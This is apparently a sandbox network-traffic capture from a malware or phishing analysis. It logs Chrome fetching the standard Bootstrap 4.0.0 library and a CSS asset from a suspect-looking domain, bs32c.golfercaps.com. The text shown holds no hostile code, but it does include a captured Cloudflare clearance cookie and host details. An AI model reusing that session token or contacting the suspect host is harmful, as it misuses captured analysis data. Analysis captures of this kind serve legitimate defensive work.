                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49
                                                                  Data Ascii: t){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryI
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74
                                                                  Data Ascii: his._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibilit
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52
                                                                  Data Ascii: =function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c
                                                                  Data Ascii: ement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66
                                                                  Data Ascii: t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.458494104.18.10.207443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC597OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                  Host: maxcdn.bootstrapcdn.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://bs32c.golfercaps.com/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:33 UTC966INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CDN-PullZone: 252412
                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                  CDN-RequestCountryCode: US
                                                                  Vary: Accept-Encoding
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=31919000
                                                                  ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                  CDN-ProxyVer: 1.06
                                                                  CDN-RequestPullSuccess: True
                                                                  CDN-RequestPullCode: 200
                                                                  CDN-CachedAt: 12/04/2024 01:55:10
                                                                  CDN-EdgeStorageId: 1067
                                                                  timing-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  X-Content-Type-Options: nosniff
                                                                  CDN-Status: 200
                                                                  CDN-RequestTime: 0
                                                                  CDN-RequestId: a350fc0ac9189571b827810d5b4d1354
                                                                  CDN-Cache: HIT
                                                                  CF-Cache-Status: HIT
                                                                  Age: 271525
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334cdf0643a7-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:33 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                  Data Ascii: 7bed/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e
                                                                  Data Ascii: ine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defin
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c
                                                                  Data Ascii: function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isEl
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 20 65 3d 6f 2e 45 76 65 6e 74 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73
                                                                  Data Ascii: e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._des
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 26 70 28 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74
                                                                  Data Ascii: &p(s).removeClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d
                                                                  Data Ascii: mouseenter"+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64
                                                                  Data Ascii: l),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d
                                                                  Data Ascii: (!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)}
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d
                                                                  Data Ascii: t(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).rem
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73
                                                                  Data Ascii: DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collaps


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.458488188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC1364OUTGET /vfd23ced/assets/jquery.menu.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:33 UTC878INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 2615
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tIoe94qbBBo9ostIXvywL4Eu1q85R3%2Bvg45zeSQHeoH751eCjiNaM6JZ6b7x6sqi2YBv0nz1c8zZRasyCpm1h9x3liWUUKSoWLXbgT0zFZ%2BeknDBvkb5uvNnrPo%2FS3S0qlJMiAKifQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334cda790fa1-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1634&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1942&delivery_rate=1640449&cwnd=252&unsent_bytes=0&cid=772daebbaf7ff114&ts=291&x=0"
